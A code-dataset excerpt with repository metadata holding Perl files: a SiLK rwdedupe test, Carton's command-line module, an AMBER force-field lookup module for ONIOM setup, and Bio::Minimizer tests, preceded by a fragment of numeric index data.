288 8 28 306
289 168 237
290 19 23 181 181 221 224 283
291 69 137
292 180 202 254
293 94 98 126 164
294 51 337
295 99 184 219 338 340
296 151 233 288 292
297 54 72 136 147 285
298 92 191 199 329
299 36 43 93 181 333 359
300 44 195 208 214 245 279 310
301 69 84 113 214 295
302 23 126 126 352
303 146 191 211 268 270
304 9 89 120 165 298 322
305 4 100 218 306
306 86 88 131 290
307 74 122 123 347
308 66 115
309 63 207 222
310 34 148 292 343
311 83 144
312 287
313 133 325
314 45 117 276 293 307 312
315 2 159 275 299
316 1 80 121 166 222 318 328
317 348 352
318 1 57 80 147
319 29 95 218
320 156 206 291 294 348 349
321 123 130 231 232 272
323 24 137 177 231 264
324 82 121 213
326 219 242 262 286 293 347
327 28 169 259 343
328 25 67 166 249 250 278 325 345
329 56 308 334
330 13 15 38 157 161
331 30 106 118 133 139 222
332 232 331 338
333 160 236 309 339
334 7 157 225 312
335 20 38 50
336 87 96 226 236 239 252 331
337 168 254 262 275 324
338 90 184 230 284 295 328
339 41 106 110 175 201 236
340 11 14 49 55 103 266
341 50 196 200 204 234 277
342 171 278 313 331
343 63 94 227 243 342
344 107 147
345 58 237 262
346 195 220 230 290 299 312
347 76 93
348 198 258 349
349 35 182 183 286 325 348
350 25 156 179 236 329
351 69 91 112 212 340 342
352 56 117 119 184 285 345
353 4 105 134 209 279
354 89 351
355 48 52 155 204 348
356 79 160 225 271
357 64 93 141 189 273 306 354
358 311
359 24 217 354
360 38 241 319 | 18.764873 | 36 | 0.729771 |
eda942dd17084deb6f9eba718973fc80d7f51303 | 813 | pl | Perl | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 3 | 2018-06-01T06:55:14.000Z | 2021-11-14T22:51:04.000Z | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 3 | 2017-07-02T17:03:34.000Z | 2021-09-09T17:05:31.000Z | silk-src/src/rwsort/tests/rwdedupe-ignore-stime-v6.pl | mjschultz/netsa-pkg | 07bf4ff29a73ebc0f58e4aa27d3ad6b1dee7fc83 | [
"Apache-2.0"
] | 4 | 2017-08-14T15:42:31.000Z | 2022-01-24T16:24:27.000Z | #! /usr/bin/perl -w
# MD5: 4d68466b8f35b4cc95929a4bfac81da7
# TEST: ./rwdedupe --ignore-fields=stime ../../tests/data-v6.rwf ../../tests/empty.rwf | ../rwstats/rwuniq --fields=1-5 --ipv6-policy=force --timestamp-format=epoch --values=bytes,packets,records,stime,etime --sort-output --delimited --no-title
use strict;
use SiLKTests;
my $rwdedupe = check_silk_app('rwdedupe');
my $rwuniq = check_silk_app('rwuniq');
my %file;
$file{v6data} = get_data_or_exit77('v6data');
$file{empty} = get_data_or_exit77('empty');
my $cmd = "$rwdedupe --ignore-fields=stime $file{v6data} $file{empty} | $rwuniq --fields=1-5 --ipv6-policy=force --timestamp-format=epoch --values=bytes,packets,records,stime,etime --sort-output --delimited --no-title";
my $md5 = "4d68466b8f35b4cc95929a4bfac81da7";
check_md5_output($md5, $cmd);
| 47.823529 | 244 | 0.725707 |
ed9c71eb31d0cea537739a45a8feefbc7917feec | 10,579 | pm | Perl | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 181 | 2015-01-08T16:31:40.000Z | 2022-03-16T14:56:44.000Z | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 104 | 2015-01-08T10:09:23.000Z | 2022-03-03T10:39:46.000Z | lib/Carton/CLI.pm | jtrowe/carton | acc6c1b295ef4d5119fe9978cfca9e754dcb80bb | [
"Artistic-1.0"
] | 50 | 2015-03-06T18:48:25.000Z | 2021-11-26T21:33:31.000Z | package Carton::CLI;
use strict;
use warnings;
use Config;
use Getopt::Long;
use Path::Tiny;
use Try::Tiny;
use Module::CoreList;
use Scalar::Util qw(blessed);
use Carton;
use Carton::Builder;
use Carton::Mirror;
use Carton::Snapshot;
use Carton::Util;
use Carton::Environment;
use Carton::Error;
use constant { SUCCESS => 0, INFO => 1, WARN => 2, ERROR => 3 };
our $UseSystem = 0; # 1 for unit testing
use Class::Tiny {
verbose => undef,
carton => sub { $_[0]->_build_carton },
mirror => sub { $_[0]->_build_mirror },
};
sub _build_mirror {
my $self = shift;
Carton::Mirror->new($ENV{PERL_CARTON_MIRROR} || $Carton::Mirror::DefaultMirror);
}
sub run {
my($self, @args) = @_;
my @commands;
my $p = Getopt::Long::Parser->new(
config => [ "no_ignore_case", "pass_through" ],
);
$p->getoptionsfromarray(
\@args,
"h|help" => sub { unshift @commands, 'help' },
"v|version" => sub { unshift @commands, 'version' },
"verbose!" => sub { $self->verbose($_[1]) },
);
push @commands, @args;
my $cmd = shift @commands || 'install';
my $code = try {
my $call = $self->can("cmd_$cmd")
or Carton::Error::CommandNotFound->throw(error => "Could not find command '$cmd'");
$self->$call(@commands);
return 0;
} catch {
die $_ unless blessed $_ && $_->can('rethrow');
if ($_->isa('Carton::Error::CommandExit')) {
return $_->code || 255;
} elsif ($_->isa('Carton::Error::CommandNotFound')) {
warn $_->error, "\n\n";
$self->cmd_usage;
return 255;
} elsif ($_->isa('Carton::Error')) {
warn $_->error, "\n";
return 255;
}
};
return $code;
}
sub commands {
my $self = shift;
no strict 'refs';
map { s/^cmd_//; $_ }
grep { /^cmd_.*/ && $self->can($_) } sort keys %{__PACKAGE__."::"};
}
sub cmd_usage {
my $self = shift;
$self->print(<<HELP);
Usage: carton <command>
where <command> is one of:
@{[ join ", ", $self->commands ]}
Run carton -h <command> for help.
HELP
}
sub parse_options {
my($self, $args, @spec) = @_;
my $p = Getopt::Long::Parser->new(
config => [ "no_auto_abbrev", "no_ignore_case" ],
);
$p->getoptionsfromarray($args, @spec);
}
sub parse_options_pass_through {
my($self, $args, @spec) = @_;
my $p = Getopt::Long::Parser->new(
config => [ "no_auto_abbrev", "no_ignore_case", "pass_through" ],
);
$p->getoptionsfromarray($args, @spec);
# with pass_through, the leading -- is kept in args
shift @$args if $args->[0] && $args->[0] eq '--';
}
sub printf {
my $self = shift;
my $type = pop;
my($temp, @args) = @_;
$self->print(sprintf($temp, @args), $type);
}
sub print {
my($self, $msg, $type) = @_;
my $fh = $type && $type >= WARN ? *STDERR : *STDOUT;
print {$fh} $msg;
}
sub error {
my($self, $msg) = @_;
$self->print($msg, ERROR);
Carton::Error::CommandExit->throw;
}
sub cmd_help {
my $self = shift;
my $module = $_[0] ? ("Carton::Doc::" . ucfirst $_[0]) : "Carton.pm";
system "perldoc", $module;
}
sub cmd_version {
my $self = shift;
$self->print("carton $Carton::VERSION\n");
}
sub cmd_bundle {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
$self->print("Bundling modules using @{[$env->cpanfile]}\n");
my $builder = Carton::Builder->new(
mirror => $self->mirror,
cpanfile => $env->cpanfile,
);
$builder->bundle($env->install_path, $env->vendor_cache, $env->snapshot);
$self->printf("Complete! Modules were bundled into %s\n", $env->vendor_cache, SUCCESS);
}
sub cmd_fatpack {
my($self, @args) = @_;
my $env = Carton::Environment->build;
require Carton::Packer;
Carton::Packer->new->fatpack_carton($env->vendor_bin);
}
sub cmd_install {
my($self, @args) = @_;
my($install_path, $cpanfile_path, @without);
$self->parse_options(
\@args,
"p|path=s" => \$install_path,
"cpanfile=s" => \$cpanfile_path,
"without=s" => sub { push @without, split /,/, $_[1] },
"deployment!" => \my $deployment,
"cached!" => \my $cached,
);
my $env = Carton::Environment->build($cpanfile_path, $install_path);
$env->snapshot->load_if_exists;
if ($deployment && !$env->snapshot->loaded) {
$self->error("--deployment requires cpanfile.snapshot: Run `carton install` and make sure cpanfile.snapshot is checked into your version control.\n");
}
my $builder = Carton::Builder->new(
cascade => 1,
mirror => $self->mirror,
without => \@without,
cpanfile => $env->cpanfile,
);
# TODO: --without with no .lock won't fetch the groups, resulting in insufficient requirements
if ($deployment) {
$self->print("Installing modules using @{[$env->cpanfile]} (deployment mode)\n");
$builder->cascade(0);
} else {
$self->print("Installing modules using @{[$env->cpanfile]}\n");
}
# TODO merge CPANfile git to mirror even if lock doesn't exist
if ($env->snapshot->loaded) {
my $index_file = $env->install_path->child("cache/modules/02packages.details.txt");
$index_file->parent->mkpath;
$env->snapshot->write_index($index_file);
$builder->index($index_file);
}
if ($cached) {
$builder->mirror(Carton::Mirror->new($env->vendor_cache));
}
$builder->install($env->install_path);
unless ($deployment) {
$env->cpanfile->load;
$env->snapshot->find_installs($env->install_path, $env->cpanfile->requirements);
$env->snapshot->save;
}
$self->print("Complete! Modules were installed into @{[$env->install_path]}\n", SUCCESS);
}
sub cmd_show {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
for my $module (@args) {
my $dist = $env->snapshot->find($module)
or $self->error("Couldn't locate $module in cpanfile.snapshot\n");
$self->print( $dist->name . "\n" );
}
}
sub cmd_list {
my($self, @args) = @_;
my $format = 'name';
$self->parse_options(
\@args,
"distfile" => sub { $format = 'distfile' },
);
my $env = Carton::Environment->build;
$env->snapshot->load;
for my $dist ($env->snapshot->distributions) {
$self->print($dist->$format . "\n");
}
}
sub cmd_tree {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
$env->cpanfile->load;
my %seen;
my $dumper = sub {
my($dependency, $reqs, $level) = @_;
return if $level == 0;
return Carton::Tree::STOP if $dependency->dist->is_core;
return Carton::Tree::STOP if $seen{$dependency->distname}++;
$self->printf( "%s%s (%s)\n", " " x ($level - 1), $dependency->module, $dependency->distname, INFO );
};
$env->tree->walk_down($dumper);
}
sub cmd_check {
my($self, @args) = @_;
my $cpanfile_path;
$self->parse_options(
\@args,
"cpanfile=s" => \$cpanfile_path,
);
my $env = Carton::Environment->build($cpanfile_path);
$env->snapshot->load;
$env->cpanfile->load;
# TODO remove snapshot
# TODO pass git spec to Requirements?
my $merged_reqs = $env->tree->merged_requirements;
my @missing;
for my $module ($merged_reqs->required_modules) {
my $install = $env->snapshot->find_or_core($module);
if ($install) {
unless ($merged_reqs->accepts_module($module => $install->version_for($module))) {
push @missing, [ $module, 1, $install->version_for($module) ];
}
} else {
push @missing, [ $module, 0 ];
}
}
if (@missing) {
$self->print("Following dependencies are not satisfied.\n", INFO);
for my $missing (@missing) {
my($module, $unsatisfied, $version) = @$missing;
if ($unsatisfied) {
$self->printf(" %s has version %s. Needs %s\n",
$module, $version, $merged_reqs->requirements_for_module($module), INFO);
} else {
$self->printf(" %s is not installed. Needs %s\n",
$module, $merged_reqs->requirements_for_module($module), INFO);
}
}
$self->printf("Run `carton install` to install them.\n", INFO);
Carton::Error::CommandExit->throw;
} else {
$self->print("cpanfile's dependencies are satisfied.\n", INFO);
}
}
sub cmd_update {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->cpanfile->load;
my $cpanfile = Module::CPANfile->load($env->cpanfile);
@args = grep { $_ ne 'perl' } $env->cpanfile->required_modules unless @args;
$env->snapshot->load;
my @modules;
for my $module (@args) {
my $dist = $env->snapshot->find_or_core($module)
or $self->error("Could not find module $module.\n");
next if $dist->is_core;
push @modules, "$module~" . $env->cpanfile->requirements_for_module($module);
}
return unless @modules;
my $builder = Carton::Builder->new(
mirror => $self->mirror,
cpanfile => $env->cpanfile,
);
$builder->update($env->install_path, @modules);
$env->snapshot->find_installs($env->install_path, $env->cpanfile->requirements);
$env->snapshot->save;
}
sub cmd_run {
my($self, @args) = @_;
local $UseSystem = 1;
$self->cmd_exec(@args);
}
sub cmd_exec {
my($self, @args) = @_;
my $env = Carton::Environment->build;
$env->snapshot->load;
# allows -Ilib
@args = map { /^(-[I])(.+)/ ? ($1,$2) : $_ } @args;
while (@args) {
if ($args[0] eq '-I') {
warn "exec -Ilib is deprecated. You might want to run: carton exec perl -Ilib ...\n";
splice(@args, 0, 2);
} else {
last;
}
}
$self->parse_options_pass_through(\@args); # to handle --
unless (@args) {
$self->error("carton exec needs a command to run.\n");
}
# PERL5LIB takes care of arch
my $path = $env->install_path;
local $ENV{PERL5LIB} = "$path/lib/perl5";
local $ENV{PATH} = "$path/bin:$ENV{PATH}";
if ($UseSystem) {
system @args;
} else {
exec @args;
exit 127; # command not found
}
}
1;
| 26.05665 | 158 | 0.557142 |
ed7b6090c709a42e0d394497d023ba5b6e951bf8 | 7,698 | pm | Perl | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | oniom/taopackage_bilab/ESPT/bak_AMBERFF.pm | BILAB/scripts | 8d9dbc1eddcf97d7da41930c29c8034480eab85d | [
"MIT"
] | null | null | null | package ESPT::AMBERFF;
our $VERSION = '0.01';
### Version History ###
# 0.01 Read in AMBER library file and prep file
#
=head1 NAME
ESPT::AMBERFF - AMBER force field atom type and partial charge lookup
=head1 SYNOPSIS
use ESPT::AMBERFF;
=head1 DESCRIPTION
This module reads in an AMBER library file (lib file) and the given prep files for
atom type and partial charge lookup.
=head2 Partial Charge and Atom Type Lookup
Given a residue name and an atom name, this object returns the atom type and
partial charge for that specific atom.
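For example, a lookup might look like this minimal sketch (the residue and atom
names are only illustrative; any residue present in the library or prep files
works the same way):
    use ESPT::AMBERFF;
    my $debug = 0;
    my $ff = ESPT::AMBERFF->new($debug);
    if ( $ff->existsresidue("ALA") ) {
        my $type   = $ff->atomtype("ALA", "CA");       # AMBER atom type
        my $elenum = $ff->elementnumber("ALA", "CA");  # element number
        my $charge = $ff->partialcharge("ALA", "CA");  # partial charge
    }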
=cut
=head1 ATTRIBUTES
=over 15
=item B<$file-E<gt>new()>
Creates a new AMBERFF object
=cut
use strict;
use warnings;
our %ffatmtyp;
our %ffelenum;
our %ffparchg;
our @ffresiduelist;
our $amberlibfile = "/Users/masa/src/taopackage/ESPT/amberff/all_amino03.lib";
our $prepfolder = "/Users/masa/src/taopackage/ESPT/prepfiles";
my $curresid;
my $endresidue;
my $curatmnam;
my $curatmtyp;
my $curelenum;
my $curparchg;
my $prepfile;
my $prepfilewpath;
my $line1;
my $line2;
my $templine;
my $debug = 4;
print "Open file $amberlibfile to read in AMBER residue template.\n" if $debug >= 5;
open(AMBERFFFILE,$amberlibfile) || die "Could not read AMBER library file $amberlibfile\n$!\n";
# Reading AMBER Residue, Atom, Partial charges from AMBER library file $amberlibfile
while (<AMBERFFFILE>) {
if (/^!entry.(\S\S\S).unit.atoms\s+table/) {
$curresid = $1;
push (@ffresiduelist,$curresid);
# add current residue as one hash element
# print "Current Residue is $1.\n";
$endresidue=0;
do {
$_ = <AMBERFFFILE>;
if (!/\s+"(\S+)"\s+"(\S+)"\s+-*\d+\s+-*\d+\s+-*\d+\s+-*\d+\s+(\d+)\s+(-*\d+.\d+)/) {$endresidue = 1;}
else {
# print "Current atom name is $1, atom type is $2, element number is $3, partial charge is $4.\n";
$curatmnam = $1;
$curatmtyp = $2;
$curelenum = $3;
$curparchg = $4;
$ffatmtyp{$curresid}{$curatmnam} = $curatmtyp ;
$ffelenum{$curresid}{$curatmnam} = $curelenum ;
$ffparchg{$curresid}{$curatmnam} = $curparchg ;
# print "Atom with name $curatmnam in residue $curresid has type $ffatmtyp{$curresid}{$curatmnam},";
# print " element number $ffelenum{$curresid}{$curatmnam}, partial charges $ffparchg{$curresid}{$curatmnam}.\n";
} # else
} while ($endresidue == 0); # do
} # if (/^!entry.\S\S\S.unit.atoms\s+table/)
} # while (<AMBERFFFILE>)
close (AMBERFFFILE);
# Almost every ONIOM calculation has one or more substrates that are not amino acids.
# If the system was prepared with AMBER, the user will have prep files for these molecules.
# The following code reads those prep files from the folder $prepfolder and
# extracts the atom name, atom type and partial charge information.
# The code assumes each prep file has this format:
# 0 0 2
#
#This is a remark line
#A5P_dianion.res
#AP2 INT 0
#CORRECT OMIT DU BEG
# 0.0000
# 1 DUMM DU M 0 -1 -2 0.000 .0 .0 .00000
# 2 DUMM DU M 1 0 -1 1.449 .0 .0 .00000
# 3 DUMM DU M 2 1 0 1.522 111.1 .0 .00000
# 4 O1 o M 3 2 1 1.540 111.208 180.000 -0.58161 8
# 5 C1 c M 4 3 2 1.193 54.434 109.126 0.54347 6
# 6 H1 h4 E 5 4 3 1.093 120.987 -156.388 0.00162 1
#...
# Please note that the original prep file does not carry an element number. To be safe,
# the user should append the element number for each atom at the end of the line. This
# guarantees that the correct atom symbol is written to the output file.
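# As a concrete illustration of the parsing below, using the sample block above:
# for residue AP2 the atom line
#  4  O1   o   M   3   2   1   1.540  111.208  180.000  -0.58161   8
# is stored as $ffatmtyp{AP2}{O1} = "O" (the type is uppercased),
# $ffparchg{AP2}{O1} = -0.58161 and $ffelenum{AP2}{O1} = 8.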
opendir(PREPDIR,$prepfolder) || die "Could not open prep file folder $prepfolder\n$!\n";
foreach $prepfile (readdir(PREPDIR)) {
if ( $prepfile =~ /^\./ ) {next;}
print "Reading prep file $prepfile ...\n" if $debug >= 5;
$prepfilewpath = $prepfolder."/".$prepfile;
# print "$prepfilewpath\n";
open(PREPFILE,$prepfilewpath) || die "Could not read prep file $prepfile in directory $prepfolder\n$!\n";
$line1 = "";
$line2 = "";
$templine = "";
while ($templine = <PREPFILE>) {
$line1 = $line2;
$line2 = $templine;
if ( $line2 =~ /^\s*CORR/) {
$line1 =~ /^(\S\S\S)\s+/;
# add current residue as one hash element
# print "Current Residue is $1.\n";
$curresid = $1;
push (@ffresiduelist,$curresid);
# Skip 0.000 and first three DUMM lines after CORR line
$templine = <PREPFILE>;
$templine = <PREPFILE>;
$templine = <PREPFILE>;
$templine = <PREPFILE>;
# clear $line1 and $line2;
$line1 = "";
$line2 = "";
$endresidue=0;
do {
$_ = <PREPFILE>;
if (!/\s+\d+\s+(\S+)\s+(\S+)\s+\S+\s+-*\d+\s+-*\d+\s+-*\d+\s+-*\d+.\d+\s+-*\d+.\d+\s+-*\d+.\d+\s+(-*\d+.\d+)\s+(\d+)/) {$endresidue = 1;}
else {
# print "Current atom name is $1, atom type is $2, element number is $3, partial charge is $4.\n";
$curatmnam = $1;
$curatmtyp = uc($2);
$curparchg = $3;
$curelenum = $4;
$ffatmtyp{$curresid}{$curatmnam} = $curatmtyp ;
$ffelenum{$curresid}{$curatmnam} = $curelenum ;
$ffparchg{$curresid}{$curatmnam} = $curparchg ;
print "Atom with name $curatmnam in residue $curresid has type $ffatmtyp{$curresid}{$curatmnam}," if $debug >= 5;
print " element number $ffelenum{$curresid}{$curatmnam}, partial charges $ffparchg{$curresid}{$curatmnam}.\n" if $debug >= 5;
} # else
} while ($endresidue == 0); # do
} # if ( $line2 =~ /^\s+CORR/) {
} # while (<PREPFILE>) {
close PREPFILE;
} # foreach $prepfile (readdir(PREPDIR))
sub new {
our $AMBERFF = {};
shift;
$AMBERFF->{DEBUG} = shift;
# print "AMBEREE debug is ",$AMBERFF->{DEBUG},"\n";
bless ($AMBERFF);
return $AMBERFF;
} # new
# Subroutine atomtype takes atom type for current atom
sub atomtype {
my $curresidue;
my $curatomname;
my $curatomtype;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Atom type inquary for residue $curresidue and atom $curatomname:\n";
$curatomtype = $ffatmtyp{$curresidue}{$curatomname};
return $curatomtype;
} # atomtype
# Subroutine elementnumber returns the element number for the given residue and atom name
sub elementnumber {
my $curresidue;
my $curatomname;
my $curelenum;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Element number inquary for residue $curresidue and atom $curatomname:\n";
$curelenum = $ffelenum{$curresidue}{$curatomname};
return $curelenum;
} # elementnumber
# Subroutine partialcharge returns the partial charge for the given residue and atom name
sub partialcharge {
my $curresidue;
my $curatomname;
my $curparchg;
shift;
$curresidue = shift;
$curatomname = shift;
# print "Element number inquary for residue $curresidue and atom $curatomname:\n";
$curparchg = $ffparchg{$curresidue}{$curatomname};
return $curparchg;
} # partialcharge
# Subroutine existsresidue checks if the given residue exists or not.
sub existsresidue {
my $curresidue;
my $currele;
my $exists = 0;
shift;
$curresidue = shift;
foreach $currele (@ffresiduelist) {
if ( uc($currele) eq uc($curresidue)) {
$exists = 1;
last;
}
}
return $exists;
} # existsresidue
1;
__END__
=back
=head1 VERSION
0.01
=head1 SEE ALSO
F<ESPT::PDB>
=head1 AUTHOR
Peng Tao, E<lt>tao.21@osu.eduE<gt>
=head1 COPYRIGHT
Copyright (c) 2009~2010 by Peng Tao
=cut
| 23.981308 | 145 | 0.605612 |
ed8552ea9cc344ca272467d2a7d27e56f364739e | 1,596 | t | Perl | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | null | null | null | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | 2 | 2019-10-10T20:19:48.000Z | 2019-10-22T01:53:58.000Z | t/05_starts.t | lskatz/Bio--Minimizer | 5b12f1d85e7798227530154432c19cbb84c8f645 | [
"MIT"
] | null | null | null | #!/usr/bin/env perl
use strict;
use warnings;
use Data::Dumper;
use Test::More tests=>3;
use FindBin qw/$RealBin/;
use lib "$RealBin/../lib";
use_ok 'Bio::Minimizer';
my $sequence = "CTATAGTTCGTCCAGCGTCTTTGAGGGTAATCATTCGAGGAACCGGACCTTTAATCACGGCTTACTTCAGTCACAAGAGGCGCTCAGACCGACCTGCATCTGGTCAGGGCCCCAGAATCACTTTTAATACTTTAGTCGGTACGTGAGGGACAGACCCAAAGGTACCGGGGCTGATTGTTATGAAGGGTTGCTTCACCGCTACGCAGGCCTCTATTCCAGACCGCTAGGCTTCTAACCTGC";
subtest 'minimizer => starts (k=>19,l=>5)' => sub{
plan tests=>7;
my $minimizer = Bio::Minimizer->new($sequence,{numcpus=>1,k=>19,l=>5});
is($$minimizer{k}, 19, "Expected kmer length");
is($$minimizer{l}, 5, "Expected lmer length");
my $starts = $minimizer->{starts};
is_deeply([sort {$a <=> $b } @{ $$starts{AATCA}}], [28,52,64,115], "AATCA");
is_deeply([sort {$a <=> $b } @{ $$starts{AGCCT}}], [10], "AGCCT");
is_deeply([sort {$a <=> $b } @{ $$starts{ACGTA}}], [96], "ACGTA");
is_deeply([sort {$a <=> $b } @{ $$starts{AGACC}}], [217], "AGACC");
is_deeply([sort {$a <=> $b } @{ $$starts{AGATG}}], [139], "AGATG");
};
subtest 'minimizer => starts (k=>31,l=>21)' => sub{
plan tests=>5;
my $minimizer = Bio::Minimizer->new($sequence,{numcpus=>1});
is($$minimizer{k}, 31, "Expected default kmer length");
is($$minimizer{l}, 21, "Expected default lmer length");
my $starts = $minimizer->{starts};
is_deeply($$starts{ACTTTAGTCGGTACGTGAGGG}, [128], "ACTTTAGTCGGTACGTGAGGG");
is_deeply($$starts{AGCCTAGCGGTCTGGAATAGA}, [10], "AGCCTAGCGGTCTGGAATAGA");
is_deeply($$starts{CCGGTTCCTCGAATGATTACC}, [194], "CCGGTTCCTCGAATGATTACC");
};
| 38.926829 | 258 | 0.674185 |